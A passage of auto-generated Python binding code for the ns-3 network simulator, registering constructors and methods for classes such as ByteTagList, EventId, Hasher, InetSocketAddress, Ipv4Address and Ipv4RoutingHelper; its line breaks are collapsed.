ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'data'), param('uint32_t', 'len')]) return def register_Ns3ByteTagIterator_methods(root_module, cls): ## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')]) ## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function] cls.add_method('Next', 'ns3::ByteTagIterator::Item', []) return def register_Ns3ByteTagIteratorItem_methods(root_module, cls): ## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')]) ## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function] cls.add_method('GetEnd', 'uint32_t', [], is_const=True) ## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function] cls.add_method('GetStart', 'uint32_t', [], is_const=True) ## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function] cls.add_method('GetTag', 'void', [param('ns3::Tag &', 'tag')], is_const=True) ## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) return def register_Ns3ByteTagList_methods(root_module, cls): ## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor] cls.add_constructor([]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor] cls.add_constructor([param('ns3::ByteTagList const &', 'o')]) ## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function] cls.add_method('Add', 'ns3::TagBuffer', [param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')]) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function] cls.add_method('Add', 'void', [param('ns3::ByteTagList const &', 'o')]) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t appendOffset) [member function] cls.add_method('AddAtEnd', 'void', [param('int32_t', 'appendOffset')]) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t prependOffset) [member function] cls.add_method('AddAtStart', 'void', [param('int32_t', 'prependOffset')]) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Adjust(int32_t adjustment) [member function] cls.add_method('Adjust', 'void', [param('int32_t', 'adjustment')]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function] cls.add_method('Begin', 'ns3::ByteTagList::Iterator', [param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')], is_const=True) ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function] cls.add_method('RemoveAll', 'void', []) return def register_Ns3ByteTagListIterator_methods(root_module, cls): ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')]) ## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function] cls.add_method('GetOffsetStart', 'uint32_t', [], is_const=True) ## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function] cls.add_method('Next', 'ns3::ByteTagList::Iterator::Item', []) return def register_Ns3ByteTagListIteratorItem_methods(root_module, cls): ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor] cls.add_constructor([param('ns3::TagBuffer', 'buf')]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable] cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable] cls.add_instance_attribute('end', 'int32_t', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable] cls.add_instance_attribute('size', 'uint32_t', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable] cls.add_instance_attribute('start', 'int32_t', is_const=False) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable] cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False) return def register_Ns3CallbackBase_methods(root_module, cls): ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')]) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor] cls.add_constructor([]) ## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function] cls.add_method('GetImpl', 'ns3::Ptr< ns3::CallbackImplBase >', [], is_const=True) ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')], visibility='protected') return def register_Ns3EventGarbageCollector_methods(root_module, cls): ## event-garbage-collector.h (module 'core'): ns3::EventGarbageCollector::EventGarbageCollector(ns3::EventGarbageCollector const & arg0) [copy constructor] cls.add_constructor([param('ns3::EventGarbageCollector const &', 'arg0')]) ## event-garbage-collector.h (module 'core'): ns3::EventGarbageCollector::EventGarbageCollector() [constructor] cls.add_constructor([]) ## event-garbage-collector.h (module 'core'): void ns3::EventGarbageCollector::Track(ns3::EventId event) [member function] cls.add_method('Track', 'void', [param('ns3::EventId', 'event')]) return def register_Ns3EventId_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_binary_comparison_operator('==') ## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor] cls.add_constructor([param('ns3::EventId const &', 'arg0')]) ## event-id.h (module 'core'): ns3::EventId::EventId() [constructor] cls.add_constructor([]) ## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')]) ## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function] cls.add_method('Cancel', 'void', []) ## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function] cls.add_method('GetContext', 'uint32_t', [], is_const=True) ## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function] cls.add_method('GetTs', 'uint64_t', [], is_const=True) ## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function] cls.add_method('GetUid', 'uint32_t', [], is_const=True) ## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function] cls.add_method('IsExpired', 'bool', [], is_const=True) ## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function] cls.add_method('IsRunning', 'bool', [], is_const=True) ## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function] cls.add_method('PeekEventImpl', 'ns3::EventImpl *', [], is_const=True) return def register_Ns3Hasher_methods(root_module, cls): ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hasher const &', 'arg0')]) ## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor] cls.add_constructor([]) ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function] cls.add_method('GetHash32', 'uint32_t', [param('std::string const', 's')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')]) ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function] cls.add_method('GetHash64', 'uint64_t', [param('std::string const', 's')]) ## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function] cls.add_method('clear', 'ns3::Hasher &', []) return def register_Ns3Inet6SocketAddress_methods(root_module, cls): ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Inet6SocketAddress const & arg0) [copy constructor] cls.add_constructor([param('ns3::Inet6SocketAddress const &', 'arg0')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6, uint16_t port) [constructor] cls.add_constructor([param('ns3::Ipv6Address', 'ipv6'), param('uint16_t', 'port')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6) [constructor] cls.add_constructor([param('ns3::Ipv6Address', 'ipv6')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(uint16_t port) [constructor] cls.add_constructor([param('uint16_t', 'port')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6, uint16_t port) [constructor] cls.add_constructor([param('char const *', 'ipv6'), param('uint16_t', 'port')]) ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6) [constructor] cls.add_constructor([param('char const *', 'ipv6')]) ## inet6-socket-address.h (module 'network'): static ns3::Inet6SocketAddress ns3::Inet6SocketAddress::ConvertFrom(ns3::Address const & addr) [member function] cls.add_method('ConvertFrom', 'ns3::Inet6SocketAddress', [param('ns3::Address const &', 'addr')], is_static=True) ## inet6-socket-address.h (module 'network'): ns3::Ipv6Address ns3::Inet6SocketAddress::GetIpv6() const [member function] cls.add_method('GetIpv6', 'ns3::Ipv6Address', [], is_const=True) ## inet6-socket-address.h (module 'network'): uint16_t ns3::Inet6SocketAddress::GetPort() const [member function] cls.add_method('GetPort', 'uint16_t', [], is_const=True) ## inet6-socket-address.h (module 'network'): static bool ns3::Inet6SocketAddress::IsMatchingType(ns3::Address const & addr) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'addr')], is_static=True) ## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetIpv6(ns3::Ipv6Address ipv6) [member function] cls.add_method('SetIpv6', 'void', [param('ns3::Ipv6Address', 'ipv6')]) ## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetPort(uint16_t port) [member function] cls.add_method('SetPort', 'void', [param('uint16_t', 'port')]) return def register_Ns3InetSocketAddress_methods(root_module, cls): ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::InetSocketAddress const & arg0) [copy constructor] cls.add_constructor([param('ns3::InetSocketAddress const &', 'arg0')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4, uint16_t port) [constructor] cls.add_constructor([param('ns3::Ipv4Address', 'ipv4'), param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4) [constructor] cls.add_constructor([param('ns3::Ipv4Address', 'ipv4')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(uint16_t port) [constructor] cls.add_constructor([param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4, uint16_t port) [constructor] cls.add_constructor([param('char const *', 'ipv4'), param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4) [constructor] cls.add_constructor([param('char const *', 'ipv4')]) ## inet-socket-address.h (module 'network'): static ns3::InetSocketAddress ns3::InetSocketAddress::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::InetSocketAddress', [param('ns3::Address const &', 'address')], is_static=True) ## inet-socket-address.h (module 'network'): ns3::Ipv4Address ns3::InetSocketAddress::GetIpv4() const [member function] cls.add_method('GetIpv4', 'ns3::Ipv4Address', [], is_const=True) ## inet-socket-address.h (module 'network'): uint16_t ns3::InetSocketAddress::GetPort() const [member function] cls.add_method('GetPort', 'uint16_t', [], is_const=True) ## inet-socket-address.h (module 'network'): uint8_t ns3::InetSocketAddress::GetTos() const [member function] cls.add_method('GetTos', 'uint8_t', [], is_const=True) ## inet-socket-address.h (module 'network'): static bool ns3::InetSocketAddress::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetIpv4(ns3::Ipv4Address address) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ipv4Address', 'address')]) ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetPort(uint16_t port) [member function] cls.add_method('SetPort', 'void', [param('uint16_t', 'port')]) ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetTos(uint8_t tos) [member function] cls.add_method('SetTos', 'void', [param('uint8_t', 'tos')]) return def register_Ns3IntToType__0_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType(ns3::IntToType<0> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 0 > const &', 'arg0')]) return def register_Ns3IntToType__1_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType(ns3::IntToType<1> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 1 > const &', 'arg0')]) return def register_Ns3IntToType__2_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType(ns3::IntToType<2> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 2 > const &', 'arg0')]) return def register_Ns3IntToType__3_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<3>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<3>::IntToType(ns3::IntToType<3> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 3 > const &', 'arg0')]) return def register_Ns3IntToType__4_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType(ns3::IntToType<4> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 4 > const &', 'arg0')]) return def register_Ns3IntToType__5_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType(ns3::IntToType<5> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 5 > const &', 'arg0')]) return def register_Ns3IntToType__6_methods(root_module, cls): ## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType() [constructor] cls.add_constructor([]) ## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType(ns3::IntToType<6> const & arg0) [copy constructor] cls.add_constructor([param('ns3::IntToType< 6 > const &', 'arg0')]) return def register_Ns3Ipv4Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor] cls.add_constructor([param('uint32_t', 'address')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('CombineMask', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv4Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv4Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function] cls.add_method('GetBroadcast', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('GetSubnetDirectedBroadcast', 'ns3::Ipv4Address', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Address', [], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Address const &', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function] cls.add_method('IsLocalMulticast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function] cls.add_method('IsSubnetDirectedBroadcast', 'bool', [param('ns3::Ipv4Mask const &', 'mask')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function] cls.add_method('Set', 'void', [param('uint32_t', 'address')]) ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function] cls.add_method('Set', 'void', [param('char const *', 'address')]) return def register_Ns3Ipv4InterfaceAddress_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress() [constructor] cls.add_constructor([]) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4Address local, ns3::Ipv4Mask mask) [constructor] cls.add_constructor([param('ns3::Ipv4Address', 'local'), param('ns3::Ipv4Mask', 'mask')]) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4InterfaceAddress const & o) [copy constructor] cls.add_constructor([param('ns3::Ipv4InterfaceAddress const &', 'o')]) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetBroadcast() const [member function] cls.add_method('GetBroadcast', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetLocal() const [member function] cls.add_method('GetLocal', 'ns3::Ipv4Address', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Mask ns3::Ipv4InterfaceAddress::GetMask() const [member function] cls.add_method('GetMask', 'ns3::Ipv4Mask', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e ns3::Ipv4InterfaceAddress::GetScope() const [member function] cls.add_method('GetScope', 'ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): bool ns3::Ipv4InterfaceAddress::IsSecondary() const [member function] cls.add_method('IsSecondary', 'bool', [], is_const=True) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetBroadcast(ns3::Ipv4Address broadcast) [member function] cls.add_method('SetBroadcast', 'void', [param('ns3::Ipv4Address', 'broadcast')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetLocal(ns3::Ipv4Address local) [member function] cls.add_method('SetLocal', 'void', [param('ns3::Ipv4Address', 'local')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetMask(ns3::Ipv4Mask mask) [member function] cls.add_method('SetMask', 'void', [param('ns3::Ipv4Mask', 'mask')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetPrimary() [member function] cls.add_method('SetPrimary', 'void', []) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetScope(ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function] cls.add_method('SetScope', 'void', [param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')]) ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetSecondary() [member function] cls.add_method('SetSecondary', 'void', []) return def register_Ns3Ipv4Mask_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor] cls.add_constructor([]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor] cls.add_constructor([param('uint32_t', 'mask')]) ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor] cls.add_constructor([param('char const *', 'mask')]) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function] cls.add_method('Get', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function] cls.add_method('GetInverse', 'uint32_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function] cls.add_method('GetPrefixLength', 'uint16_t', [], is_const=True) ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv4Mask', [], is_static=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Mask', 'other')], is_const=True) ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function] cls.add_method('Set', 'void', [param('uint32_t', 'mask')]) return def register_Ns3Ipv4RoutingHelper_methods(root_module, cls): ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper::Ipv4RoutingHelper() [constructor] cls.add_constructor([]) ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper::Ipv4RoutingHelper(ns3::Ipv4RoutingHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4RoutingHelper const &', 'arg0')]) ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper * ns3::Ipv4RoutingHelper::Copy() const [member function] cls.add_method('Copy', 'ns3::Ipv4RoutingHelper *', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4-routing-helper.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4RoutingHelper::Create(ns3::Ptr<ns3::Node> node) const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [param('ns3::Ptr< ns3::Node >', 'node')], is_pure_virtual=True, is_const=True, is_virtual=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheAllAt(ns3::Time printTime, ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheAllAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheAllEvery(ns3::Time printInterval, ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheAllEvery', 'void', [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheAt(ns3::Time printTime, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintNeighborCacheEvery(ns3::Time printInterval, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream) [member function] cls.add_method('PrintNeighborCacheEvery', 'void', [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_static=True) ## ipv4-routing-helper.h (module 'internet'): static void ns3::Ipv4RoutingHelper::PrintRoutingTableAllAt(ns3::Time printTime, ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) [member function] cls.add_method('PrintRoutingTableAllAt', 'void', [param('ns3::Time', 'printTime'), param('ns3::Ptr< 